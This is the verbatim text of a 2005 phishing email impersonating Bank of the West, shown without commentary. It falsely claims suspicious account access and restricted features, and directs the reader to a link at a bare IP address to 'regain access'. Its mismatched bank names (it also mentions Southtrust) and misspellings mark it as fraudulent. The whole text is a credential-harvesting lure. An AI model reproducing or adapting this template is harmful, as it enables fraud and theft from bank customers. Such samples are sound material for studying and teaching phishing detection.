Bank of the West Online Banking, Please Update

From: identdep_op085345@bankofthewest.com
Date: 08/23/05

    Dear Bank of the West customer,

    We recently reviewed your account, and suspect that your
    southtrust account may have been accessed by an unauthorized
    third party. Protecting the security of your account and of
    the Bank of the West network is out primary concern.
    Therefore, as a preventative measure, we have temporarily
    limited access to sensitive Southtrust Bank account features.

    Click the link below in order to regain access to your account:

    http://67.159.21.246/bankofthewest/

    For more information about how to protect your account, please
    visit Bank of the West Security Center.

    We apologize for any inconvenience this may cause, and apriciate
    your assistance in helping us maintain the integrity of the
    entire Bank of the West system.

    Thank you for your prompt attention to this matter.

    Sincerely,
    The Bank of the West Security Department Team.